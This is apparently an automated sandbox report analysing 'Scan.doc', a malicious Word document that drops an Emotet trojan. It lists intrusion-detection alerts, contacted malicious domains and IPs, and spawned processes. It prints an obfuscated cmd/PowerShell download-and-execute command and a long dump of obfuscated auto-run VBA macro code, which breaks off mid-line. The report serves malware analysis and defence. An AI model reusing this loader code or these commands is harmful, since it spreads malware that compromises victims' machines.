Scan.doc
This report is generated from a file or URL submitted to this webservice on February 28th 2018 11:13:47 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v7.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Persistence
- Spawns a lot of processes
- Network Behavior
- Contacts 4 domains and 5 hosts.
Indicators
Not all malicious and suspicious indicators are displayed.
-
Malicious Indicators 15
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ETPRO TROJAN W32/Emotet.v4 Checkin" (SID: 2827279, Rev: 5, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN W32/Emotet.v4 Checkin 2" (SID: 2827580, Rev: 7, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN W32/Emotet.v4 Checkin 3" (SID: 2828008, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
-
5/67 reputation engines marked "http://www.utilitybillingsoftwares.com" as malicious (7% detection rate)
6/67 reputation engines marked "http://amor.official.pw/f3sqvf" as malicious (8% detection rate)
9/67 reputation engines marked "http://amor.official.pw" as malicious (13% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 5/59 Antivirus vendors marked sample as malicious (8% detection rate)
- source
- External System
- relevance
- 8/10
-
General
-
The analysis extracted a file that was identified as malicious
- details
- 34/67 Antivirus vendors marked dropped file "195082.exe" as malicious (classified as "Trojan.Generic" with 50% detection rate)
- source
- Binary File
- relevance
- 10/10
-
The analysis spawned a process that was identified as malicious
- details
-
34/67 Antivirus vendors marked spawned process "195082.exe" (PID: 2840) as malicious (classified as "Trojan.Generic" with 50% detection rate)
34/67 Antivirus vendors marked spawned process "195082.exe" (PID: 3360) as malicious (classified as "Trojan.Generic" with 50% detection rate)
- source
- Monitored Target
- relevance
- 10/10
-
Installation/Persistence
-
Writes data to a remote process
- details
-
"cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"cmd.exe" wrote 8 bytes to a remote process "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 84)
"195082.exe" wrote 32 bytes to a remote process "%PUBLIC%\195082.exe" (Handle: 164)
"195082.exe" wrote 52 bytes to a remote process "%PUBLIC%\195082.exe" (Handle: 164)
"195082.exe" wrote 4 bytes to a remote process "%PUBLIC%\195082.exe" (Handle: 164)
"195082.exe" wrote 8 bytes to a remote process "%PUBLIC%\195082.exe" (Handle: 164)
- source
- API Call
- relevance
- 6/10
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "173.203.172.88": ...
Found malicious artifacts related to "69.175.93.166": ...
Found malicious artifacts related to "217.160.0.130": ...
Found malicious artifacts related to "94.199.180.228": ...
- source
- Network Traffic
- relevance
- 10/10
-
Multiple malicious artifacts seen in the context of different hosts
- details
-
Found malicious artifacts related to "173.203.172.88": ...
Found malicious artifacts related to "69.175.93.166": ...
Found malicious artifacts related to "217.160.0.130": ...
Found malicious artifacts related to "94.199.180.228": ...
- source
- Network Traffic
- relevance
- 10/10
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- File/Memory
- relevance
- 10/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6.doc""
Spawned process "cmd.exe" with commandline "cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('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' |ConVerTTO-secuREStrING -KEy (146..169)) ))))"
Spawned process "powershell.exe" with commandline "powershell "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('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' |ConVerTTO-secuREStrING -KEy (146..169)) ))))"
Spawned process "195082.exe"
Spawned process "195082.exe"
- source
- Monitored Target
- relevance
- 8/10
-
Hiding 4 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 8
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ET DNS Query to a *.pw domain - Likely Hostile" (SID: 2016778, Rev: 4, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET INFO HTTP Request to a *.pw domain" (SID: 2016777, Rev: 11, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET POLICY HTTP traffic on port 443 (POST)" (SID: 2013926, Rev: 8, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1" (SID: 2018358, Rev: 7, Severity: 2) categorized as "Potentially Bad Traffic"
Detected alert "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download" (SID: 2016538, Rev: 3, Severity: 2) categorized as "Potentially Bad Traffic"
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
5/67 reputation engines marked "http://www.utilitybillingsoftwares.com" as malicious (7% detection rate)
6/67 reputation engines marked "http://amor.official.pw/f3sqvf" as malicious (8% detection rate)
9/67 reputation engines marked "http://amor.official.pw" as malicious (13% detection rate)
- source
- External System
- relevance
- 10/10
-
General
-
Found a potential E-Mail address in binary/memory
- details
-
Pattern match: "h@qfvqe.crig"
Pattern match: "drc@e.lidu"
Pattern match: "ap@plicat.run"
Pattern match: "tz@iuqjit.oscwzoilusjcaa"
- source
- File/Memory
- relevance
- 3/10
-
Installation/Persistence
-
Creates new processes
- details
-
"WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1328)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 84)
"195082.exe" is creating a new process (Name: "%PUBLIC%\195082.exe", Handle: 164)
- source
- API Call
- relevance
- 8/10
-
Drops executable files
- details
- "195082.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Network Related
-
Found potential IP address in binary/memory
- details
- "91.217.66.130"
- source
- File/Memory
- relevance
- 3/10
-
Unusual Characteristics
-
Checks for a resource fork (ADS) file
- details
- "powershell.exe" checked file "C:"
- source
- API Call
- relevance
- 5/10
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "vbHide" which indicates: "May run an executable file or a system command"
Found suspicious keyword "ChrW" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
Found suspicious keyword "StrReverse" which indicates: "May attempt to obfuscate specific strings"
- source
- Static Parser
- relevance
- 10/10
-
Informative 22
-
Environment Awareness
-
Tries to sleep for a long time (more than two minutes)
- details
- "powershell.exe" sleeping for "1566804069" milliseconds
- source
- API Call
- relevance
- 10/10
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ET INFO Windows OS Submitting USB Metadata to Microsoft" (SID: 2025275, Rev: 1, Severity: 3) categorized as "Misc activity"
Detected alert "ET INFO EXE - Served Attached HTTP" (SID: 2014520, Rev: 6, Severity: 3) categorized as "Misc activity"
- source
- Suricata Alerts
- relevance
- 10/10
-
General
-
Contacts domains
- details
-
"www.utilitybillingsoftwares.com"
"amor.official.pw"
"t-p-e.net"
"www.erzotech.eu"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
-
"173.203.172.88:80"
"69.175.93.166:80"
"217.160.0.130:80"
"94.199.180.228:80"
"91.217.66.130:443"
- source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: ""
File "zAnsZRGs.bas" (Streampath: "Macros/VBA/zAnsZRGs")
File "pOzAhdwW.bas" (Streampath: "Macros/VBA/pOzAhdwW")
7134264 * AQkRzVDR * (4322225 / vPGcmK / 4483053 - Tan(bnNbsBnnSCiQAl / CBool(PIISDwwfIKifL / 258099 / OmmRjzDZY))))MIcYmhHOZ = iiMDBnFFJ = qUirTwdHE = (3285733 / Wbmwnr + 5682163 * EvLikkYkuiV * (820644 / WpKAkuTTCp / 9795479 - Tan(OMCaGN / CBool(cWEaimuHuOidjM / 6347706 / mbvDw))))InXrLQbYI = gjHBjhbyuf(bbWqbSbJJ, 16, 60)XPHfTP = "TbaQoYjzwCwWnQaMbHVkUYDziEMIdftDA1AgNAgDA5AQZAMDAzAAMAkDA3AgNAMDAwAQMAADAmBgNAIGA2AgMAYDAmBANAUGAxAQOAUGAzAAZAQDAjBQZAIDA0AgYAEGAxAQMAUDA1AgMAMGA5AAMAQDA3AAMAMDAzAQNAYGA5AwYAYDA5AShnd"kWMEMBfq = KGdtCdwpj = UaUjjXSsQGhbaU = (5388568 / dwFmIIuqUhi + 2320120 * AKmdDt * (3813355 / WhjhJIsajjIRV / 10405 - Tan(ktnLjiMCoGjQwu / CBool(XaIoHOYFzzCPlB / 4988558 / ozKCjPhnPJfsa))))GZpckzMhf = aswflIiJj = kLooMdObAOMvQ = (7211712 / NHsUZzjfiZHGk + 9871886 * rkHHZqvbVJAii * (5782347 / fbKmYAq / 7868103 - Tan(vBjJOE / CBool(ibHXbnJLC / 3558788 / WKYOFBRujvz))))kJQbk = gjHBjhbyuf(XPHfTP, 5, 147)PTJPLcdqonj = "sKWNnZAIDA1AwNAEGA4AgMAUDAzAgMAQGAmBwNAIGAiBQMAQGAmBANAMDA4AAZAMDA1AwMAIGAzAgNAEDAyAANAIDAkBQMAADA3AQMAcDA2AAMAEDAxAANAQGAkQUlqz"smwXnkAVLtk = fsnNYSLMo = MOMCbJXAtl = (3806135 / XULiGOviaiiWaO + 9605381 * iCzjkYBrUWmaq * (3338003 / uzhUTBpL / 9375665 - Tan(JAijqbML / CBool(WqlnNwSTNk / 5492766 / nJRkWstir))))BJirSRMj = orDQaXWIi = ZPNvaIMUWAhca = (3882905 / WrNzTiSjmiziWm + 5126132 * LjqDFaOqbJXXdJ * (2277143 / iUDjJJKL / 1188045 - Tan(aMbaqivEWtk / CBool(qvdWXKLv / 545594 / WizCjumCYi))))jKofwjNlE = gjHBjhbyuf(PTJPLcdqonj, 7, 117)uiZcrs = "kDkYzNHcdKUiHwpduGjwlIDA0AQNAYDAmBwNAMGAiBQZAQGA2AgZAMGA4AAZAIGAlBgZAcDAjBwMAkDA1AAOAADAxAgMAkDAjBANAkDAmBgMAEDAlBQMAQGAiBAOAkDA5AwYAADAiBAZAIDA3AQZAQGAmBQOAIDA1AgYAcDA5AgYAADAxAgNAcAimaj"bVtOMZUuzBi = uPYJSDzch = uRkwMisWWG = (4958735 / OORTDPwvnsX + 5988285 * PSRoPAzRfR * (1631293 / PwAwfmjRMBJszz / 6540680 - Tan(mrCuFUwMbi / CBool(FaQjzI / 4573592 / SzwHFqNRNIZo))))oKwalV = PSVfnOOqu = oXwjbrvSMjbLPj = (7993079 / zDrCjDCuqnF + 7172984 * iujtSIZLYPVWvw * (8064040 / DDopERK / 9812358 - Tan(QlUCpomKXiouR / 
CBool(XQYYoVjnGMjnkQ / 9106425 / QkhBCXEIjajMY))))jwhPS = gjHBjhbyuf(uiZcrs, 6, 161)HNljdjwLo = "wwXFzzcMonZlqwjhYkaRANAcDA1AgZAUDA2AQZAQGAyAQYAUGAlBwYAUGAlBgZAQGA0AwMAIGAwAwYAQGA2AQMAIDA0AgNAgDA0AAOAIDAhBQOAUGA4AQNAQGA4AgZAIDAyAANAcDAlBgZAcDA5AgZAMDAkBwYAcDAjBAOLEAMJ"kwYnIhjTMT = iHuUHOwMD = ffwrEWPJwwqLwn = (9245020 / SUpGkAWI + 7759333 * aVjtaJCRzbuh * (3541158 / TDIia / 4424119 - Tan(GYrvdW / CBool(NiJnCSwucFVhIj / 8130761 / VkCpnjsn))))RPFvacwunvi = iRbTzozwm = DSSHiz = (841482 / aDMsOcQDW + 2098256 * jJjmVFlqcz * (7691371 / YuDdXC / 2660664 - Tan(CkPGob / CBool(DzDtSmVFwWjw / 379606 / IbamvnzKwtBIE))))dnviYZlaFD = gjHBjhbyuf(HNljdjwLo, 6, 146)dDBfWqswBYl = "ii2AwNAYGAiBAZAgDAlBgNAIGA5AgYAUGA4AQYAIGishhNjRRjpE"NIYZQjUXwOE = fDLIEaDcG = CTDinJIw = (2561036 / SWwoiuMTanKFn + 5631833 * AftrWmBhlF * (7017874 / qChGP / 9648388 - Tan(oIFXdKNkCSIwf / CBool(EndOFqFQp / 2483611 / upVRshuHtoU))))JMOtpGcmdNn = vHQjICwPd = EilOEs = (2029575 / oXTsoj + 3904858 * SKlOomlksVwYi * (584123 / ajapLkCn / 7897066 - Tan(AERADTjMQjo / CBool(OTStBWjtmZ / 7272966 / tIOtIH))))nnwzJzqUUu = gjHBjhbyuf(dDBfWqswBYl, 12, 39)cPWlw = "SkbDAyAgMAYGAhBwMAQDAlBAZAYGA5AQYAQDAlBQYAcDAlBAZAEGA4AQOAUGAyAgMAQGA3AAOAgDAiBQZAIGAiBANAEGAwAgMAMDA4AgYAgDA5AQZAcDA5AgYAYDA3AjFZOwqCt"BlZcj = izhDRVQpm = zRASPjDfjwHm = (8997914 / JuPYTnwNuXR + 2601460 * hJRdcLmWFSh * (3980077 / DSjRdvEBt / 4461486 - Tan(rWwmjX / CBool(ABDVWSTfbH / 1900702 / bhEtk))))KrKLnD = jhcuWJfnm = lGMAnhp = (6367742 / WhwOwzUw + 8321032 * vYncOGCujdsYi * (6850997 / hZOHWW / 7437799 - Tan(lWCjS / CBool(wCMnzrnwdw / 8967133 / mGDawzMIQYFp))))wfulZS = gjHBjhbyuf(cPWlw, 9, 124)vkudtYdiC = "pkIkoAcDAhBQOAADAkBAMAYGAqcpTiusfSNFJr"vLVzPTF = MNVOLoDTj = HvisGqEpcZbUEw = (7632590 / HKpvDMoBYOEdWV + 9098104 * VTXMiO * (533504 / ijAOHrI / 4789469 - Tan(PjsdlsuGhU / CBool(mbTHiVwlZbMsH / 5783974 / TLaujGf))))EIjaGGSHw = CGoCckacG = uKYHQ = (8706000 / lsWzACokzYY + 6837545 * nnlGZMSbsOK * (9306839 / LwwFFDSrI / 7674994 - Tan(fCEARcMBtaN / 
CBool(ZRhEaH / 8791124 / MDfqpnuSVR))))qccNtmb = gjHBjhbyuf(vkudtYdiC, 14, 20)ifrzOmVju = "ADDOCnTMGmirEQliQOAUDA0AANAgDAyAgNAADAmBQMAUGAlBAMAADAmBwNAkDA0AQYAMDAzAQOAMDA0AgNAMDAwAAMAEDA0AgZjRwlfLiQXTTcSvUCP"nihcEZGwn = jRPtrKBAR = TZYbcKQJhTpTjI = (2003540 / NasSFIUZd + 9736862 * GGCBjUmNu * (644148 / rEwSRpM / 2490772 - Tan(HiUwbHzsLFz / CBool(inKDfSGwuvQTDi / 7761119 / nqfMQOPXl))))AnhCV = FacVtCoDM = RmOmWGO = (8010323 / SAtsTiF + 3952771 * mhPXmRZrdd * (151861 / bPqVXiYEIGBYD / 1055813 - Tan(LhIrohNRiztA / CBool(MicloTqkDXvvjQ / 3486686 / jrTjjOKVmMK))))iRGUUsNY = gjHBjhbyuf(ifrzOmVju, 18, 82)dHMZBuXtBo = "wfiYwQTahjlPnawDAxAQNAIGAlBgMAcDAxAQOAIGAwAAMAQGAyAgYAQGAlBAMbwiwpMRw"TPpHONjtX = tjffzAGjS = oNIABKicTNLaA = (7749519 / JiObojdhh + 1765236 * cDmwkVS * (292358 / lzXMzvDOAnT / 6131813 - Tan(HnRsEdHLjarqi / CBool(qVdpHzImKK / 269225 / tfOjtpflww))))oIvfDVkz = jsRouUEYf = RUNtWwLji = (4074126 / HqdjbwzjCK + 9456727 * rolYSEnhli * (5908629 / YRVKvd / 9774166 - Tan(bVYBn / CBool(SXFrd / 2339543 / qWElZsbv))))iwqmwDfj = gjHBjhbyuf(dHMZBuXtBo, 9, 46)saLsWqnASUj = "oUrhqtTcaYgDAnzRFNcYSwMOAwCF"DzzaG = sRtlwsSLm = GVIYKKLzL = (6183644 / MhTjujjHKo + 2833116 * zXCliNudGdXoGO * (1794589 / WQcToUjjZCDLlE / 5472110 - Tan(sXKAIZdmQDU / CBool(KfcjXlktMvJ / 5563719 / SLjJjrBBnwjDI))))izIZGwtSTib = nwnpDlzzZ = ZXoAUiXwNhJpO = (9439404 / jLTjXitdOw + 7648419 * WrXdtt * (3310126 / mvrhSQ / 9927546 - Tan(WzziqNWaj / CBool(BLjuZCjc / 227460 / pEPwz))))JDFSWTdkrtS = gjHBjhbyuf(saLsWqnASUj, 16, 3)OYkZjF = "vZMLZLFXOIYpLizLzWHYCRtHvisOYGAkBQMAYDA1AAMAUGAjBQZAcDA3AwNAkDAhBQZAUGAlBgMAUDAjBwNAcDA0AwNAUGA4AAOAADA3AwYAYDA2AguPKmCXacGz"JmozzDMiUmb = GzFzAGNHN = tErJwVdBfiCajN = (2922446 / quvqwHjl + 3893558 * QMoCjpjkfQ * (6990838 / ijKRS / 9210800 - Tan(fRsjkQSMWAlXFp / CBool(FQMczMuv / 6556697 / foMOjholmoNYcD))))qzhjV = mQdJjttiM = btEpwmlV = (1980426 / FcGzqTzmTAEj + 7713391 * qjjkLo * (930090 / bvnmd / 9819399 - Tan(zDrOrwJJfTQw / CBool(LLMuFu / 9812564 / DAKVjEA))))TiwGaYD = 
gjHBjhbyuf(OYkZjF, 11, 86)NYiUQCn = "ZGnZiroBtCFswAgYAgDAzAAZAMGAmBAZAYGAwAANAIGAkKIA"iNDRRVPpq = BiQYwiowT = ObiYUDrT = (4850 / TTTBVStKRjuj + 9049938 * jvAwIPja * (5383173 / LLmAHiK / 82662 - Tan(AfiOPCfodfmXf / CBool(NoZCtKkHsrF / 8051457 / ftDmWup))))coSawZIji = vkAjlwdbC = pqfiZLibRpKsnq = (1763553 / rzvasQdql + 5567606 * sRwhIEwBOKfG * (6579516 / LEEfCzKX / 2328473 - Tan(ijcCZ / CBool(ptwXpKU / 1550265 / oqpuP))))WvCDvIYJ = gjHBjhbyuf(NYiUQCn, 4, 32)GDFwGBnd = "iTHULinJSThUjuKlSCaTGNirtSeRUceS::]LAHsram.SecIVRESPoRETNi.EmItNUr[ (otUAGniRTsOTrTP::]LaHsRam.sECivrEsporetnI.emiTNuR[ ((XEiCwfTczYQcbhSlZlAc"rwhXqMKs = BRDRvpnMv = rkbwbmPGYzfD = (9772879 / kPkSjcUPAHGi + 2695084 * KiazvmChjwhFq * (8899612 / IEwTQjfFUdTU / 5480417 - Tan(TqsYWwqYfIM / CBool(DjlkimaisDIP / 9518522 / idFWbRa))))kOjPZTWp = zPIojTzuk = pGfdwTjwj = (8979401 / rQhdbKRMSJjvKF + 3284640 * wzTcjHiTIR * (6612948 / KWYvWbGzaLF / 1647043 - Tan(hSPILVXhqnA / CBool(SOklOUJ / 5473690 / CwklYizRCksK))))jIBTlSFkaIz = gjHBjhbyuf(GDFwGBnd, 18, 106)tVrcq = "cBM0AwMAUGA4AAZAUGAyAwNAIDA4AAOAMGAiBANAcDAjBQMAQGAiBgZAYDAwAQNAcDAwPphDCJJQNjoRFYWN"IIOkakLYFq = rbmRLCiFD = zXlWCOiZNQw = (5023489 / SSstsWi + 4383201 * HOIzD * (8042930 / jjAsaU / 9401839 - Tan(urzOjzHXQQU / CBool(TJmjVLsPXNDKsQ / 6468880 / whkwVMzAZTn))))ZIAovifYTz = HzrrijqpX = QXObhJjomWSPbb = (6866470 / VdHJlJCXlPj + 4303756 * bCbKjfJV * (4340761 / CTMnzUrYPHCN / 2412042 - Tan(NLHVqqRcKUK / CBool(rFrvZKzp / 823504 / ZWFDtrQOSOptz))))dzlRupHv = gjHBjhbyuf(tVrcq, 17, 65)SmQjAWqZ = "wLcQAYLvTkipjXBAkDAxAgMAMDAiBQNAEDA4AgNAYGAiBwYAkDAxAQZAQDAwAQYAMGAiBQOAQDA2AgMAcDA4AAMAYGA4AQZAADA4AAOAcDA5AQMAIGAiBAZAADAiBQNAgDAiBAOAQGA1AQOAQGAmBANAMDAzAANAQGA3AQNAQDAkBAMAUGXwpiEqqAtdwqnONPGfCzFoD"EYRwpJhmJTG = jjNokUPUq = btcwAkP = (1074239 / Pkfzjds + 6595429 * zQiozwcMiXJkkV * (2781765 / NUOQNdLrwS / 9409414 - Tan(miLsm / CBool(VafmwfWo / 509716 / vdfPRWWIiRlVE))))wTwjzJMTq = rsizXaDLR = UAnvaXiuZbTvTn = (6359695 / QICOUizVnuSf + 9675947 * zjdfKPd * (5066751 / 
lvWMulwYqSkKuJ / 703726 - Tan(qARHfFCwLb / CBool(RndRKpMRSzRF / 7050750 / VbNNEEWaCTPLS))))fHkdZ = gjHBjhbyuf(SmQjAWqZ, 24, 163)JDVYs = "rSSjtRqAMGAjBwMAADAyAwMAYGAzAAZAIDA3AgYAkDAyAgNAUGAiBAZAEGAzAgNAIDAyAQMAADAkBQYAYDAhBgZAUGAkBQZAEGAyAgNAYDAyAAOAADAhBgYAEGA1AQOAUGA5AAMAQDAiBAZAbcWl"uUOPzhqw = UUqiVfWrF = mLMLmlXdP = (7403044 / jwhoawW + 8846466 * lkoRHcvZqcmQoi * (7411008 / QkkPO / 4851865 - Tan(cWkVItuizzKoBW / CBool(DKqwmmAuvUvlKM / 7283137 / hLkMuXGmfv))))ZBLBU = tmTiqkjUj = ZPmMbcpBMH = (6841369 / NTccRJBfD + 640013 * qtNbQiKF * (8229902 / KERZXkRiFZY / 2375170 - Tan(ZzBOTWSAX / CBool(wvTOBYXCB / 8611467 / CPLCtYjzwduiW))))UHHIQHPzS = gjHBjhbyuf(JDVYs, 5, 137)UiztOiYhAj = "rUAEDA4AwYAkDA4AwMAUGAmBgZAEGAmBQNAYGAyAQNAYDAjnozMKJflXwiPZzZmiCWKco"EiNEwWjEQE = AsYMhEcpq = ULWKnYSjrZLGB = (7873123 / CpHLXS + 4752657 * jGLaZDpn * (5124254 / uIuiwwOk / 2523110 - Tan(FYuqjGiPUdSZ / CBool(rnEbzsdBlloGjL / 3959878 / LznFlOKMUqTZa))))hiEZir = TzzUMCusU = rjlTnGkD = (8903620 / VJffUK + 5537115 * sHHZDbSnol * (3673013 / ZBqjwV / 9890387 - Tan(XFkmZPEKRUACaS / CBool(NJRfKBARwkljUS / 9791493 / wLhFmXUAoWI))))UulGq = gjHBjhbyuf(UiztOiYhAj, 24, 44)pvRCJFzZ = "qJPInVmJjhlnsAEDA5AwYAkDA4AQMAYDAxAgMAYGAhBwYAgDAiBgMAADA4AAZAIGA5AgYAMDA4AQNAQDAyAAOAcnMKVkbLLwDC"kICFNCSHqIr = hiAsrJVnp = LjaFUM = (2230381 / oFlQZ + 6698529 * HQzXRiu * (7782608 / VnCwpkwRo / 1588799 - Tan(nfciQPKqoZRER / CBool(ktXPXcQvAkj / 1969697 / MDGUbRp))))dcNiW = YbnPHCTEz = DikSF = (8306354 / CRjcsisBFC + 9683134 * iFpncIIGIHVI * (2279325 / AjwZuHMfSKlMjz / 9106123 - Tan(BzVSRuO / CBool(IKwlSuvXQwiLDj / 1572582 / aCnfCPbLKuGVn))))ntJcDiWtZXO = gjHBjhbyuf(pvRCJFzZ, 12, 74)TjhXiqD = "YLvhXuaslfHORakdIqETjBQYAIDA2AQNAkDA2AgZAMDAjBwYAUGAjBQYAEDA2AAMAQDA1AAOAADAwAAOAcDA4AgMAQDAzAwYAEDAxAAOAEDAmBAZAkDAhBwYAQDA4AgNAMGAiBQYAIDA1AQMAQDAyAQZAMDA4AANAQDAlBgZAgDAlBgZAMDAkBQNAIDA4AQYAQDA2AAZAIGAxAgZAMDAwAQOAADAmEDaBb"jblYmUEE = rQEZrtzmC = bVEYIprVGwwfcM = (8925790 / wkafLKJoHT + 1160172 * KfBDhtADMWhUOz * (8439089 / 
cMosfRzOLXkRL / 3085714 - Tan(pjtLawuz / CBool(LqNZCGQNSPM / 8920816 / NTtimsJJjsw))))OjhjCHK = EskVmRzhP = joDXL = (1034148 / WwwDXK + 4221053 * RrKCoZbwQ * (4059567 / WvaBSif / 5012602 - Tan(ipLamCmlvsh / CBool(OvVZmfbfFpn / 384821 / jLwzd))))ddWLaoYwjX = gjHBjhbyuf(TjhXiqD, 7, 199)NaivjKdl = "ZtbDzovqzQYAIzkjpHoUIzNrzMAQGAhBAZAwHA9AQPAcGAuBQMAkHAPBgTAUFA2BAUA4EAiBgQAgEArBgTAMGAzBwaAgFApBgQAUGA8BgM5435a05061b3143240f3476111d29467'($(RTSBOfQS"FfWIojB = EuvLCMQts = foWsZoA = (903348 / aHjPwlQLwXWF + 8490926 * hiTFAz * (4893213 / IkTSczAcTM / 7967587 - Tan(zmVfzalATVV / CBool(nfoNFi / 9872383 / Ovzwvj))))RzGnorP = ISLTDKPML = JnIaNYLmOMizJm = (4454894 / MjQCnWkRRSpA + 3504911 * qbUtERa * (4800697 / pkMkiBLJYwSzj / 9179164 - Tan(HnDrIu / CBool(LUCWDdPiFKn / 8390918 / RblBPGJRDz))))KJZTfP = gjHBjhbyuf(NaivjKdl, 4, 122)vJXWlj = "ZGFbBwmnrPazbKzMQvcADtCogMAADAlBgNAgDAxAAOAkDA2AANAQDAlBgMAMGA3AQNAMGA5AgZAEDA2AQYAADAlBQZAYDAkBgYAIDAyAgYAEGA0AwNAMGAyAgNAIDAwAwNAEDA4AgYAcDAGuEJP"mdizzCjwfn = jpNzXCjUJ = daMKmrHwFMM = (3561756 / JTJRzwjqAW + 8885859 * MMQsUS * (2082203 / NXYknbSWXj / 6638578 - Tan(QNDjOkiX / CBool(qcESAafrF / 7048693 / BpOmuYiWiMTRn))))bdLBdzZqvB = dtwIjijkm = WuUSn = (158562 / iRzoObzRmpGM + 8716265 * XLQoGbX * (1643325 / AKOmssZGrV / 8392485 - Tan(CSzORzqwodX / CBool(pwiDdjYPWpwiA / 7759094 / YMjOrB))))UZpOKtovWMh = gjHBjhbyuf(vJXWlj, 6, 118)lINwNw = "OifETHFz )))) ))961..641( yEK- GNIrtSERuces-OTTreVnoC| '==AA2AQMAYDAhBQOAEDA0AQOAgDAwAzFJWcBTAklYPo"VwFRKWVYcck = VOptjLUiV = kCEwtHij = (9040514 / SwjUbYGLiiw + 4410447 * wtGuino * (4622363 / nZsjifKl / 3024060 - Tan(plYXhVRHEJ / CBool(nWNrHFmMEwGIAK / 1378374 / uqbBzSUhZY))))iwjzwhSLZai = WYZMfkOSA = fpaZX = (4872565 / fjcXMat + 4462005 * dICUBfSj * (6662822 / mrQWuhK / 791564 - Tan(FPBdXHpwwAKzfp / CBool(HGPfBzX / 8312510 / KmTOMiqBWzRBb))))uOHTI = gjHBjhbyuf(lINwNw, 14, 79)CtkUlwYfi = 
"rWBYYoGzijNTnitGSIfOKTYZwSNDAfhtqMAIDA2AwMAMDA1AwYAkDAlBAOAYDA4AQMAUGA5AQNAgDAyAQMAEGA1AANAMGA2AQYAMDA3AgYAYGAiBQMAADAiBwYAMDAyAwMAYDAkBQMAMDAhBAMAUDAjBQNAYGAzAAZAMGAkBwNAYDA5AgNAYDAwAwNAUGAyAYvKqOv"kWwfKMS = jOOqsDWvi = FHlXO = (6211209 / IFVDNanoBWIln + 5300370 * qrFVzqULIkh * (7498052 / wlqZoufC / 2467903 - Tan(WoaCrjNKucYR / CBool(SthAnuMSfnVpP / 6145690 / wtwidGjhYnd))))aIJoivDpaJz = ivZmKthrY = HtsIARqAFMb = (78948 / OBjunniLIM + 1843768 * RsscbIX * (1355119 / ozEWc / 7945412 - Tan(jTbCiQLkiztEq / CBool(wjisjYzY / 5699435 / DtcZC))))vqzkvC = gjHBjhbyuf(CtkUlwYfi, 7, 159)uGMLD = "ITMvfUBjuiA3AQYAQDAyAQNAcDAzAgMAEGAjBAOAMDAwAAZAMGAmBQNAQDAlBQOAkDA2AwMAYDAhBwYAMGAmBAMAotpVIjMMVQn"SuJlN = AJWLACMLY = HrpLh = (8728323 / TqZASOoNcXrbN + 8489026 * oFnXsztBnk * (1789620 / QMbzwZQ / 20055 - Tan(qchviz / CBool(iUjKMfCjY / 1930030 / tapmQ))))SpqZodGzfm = JAXAAatCz = WzdFcJzVXSAwA = (7165868 / rYoYWZ + 3215938 * LYuLz * (4465057 / 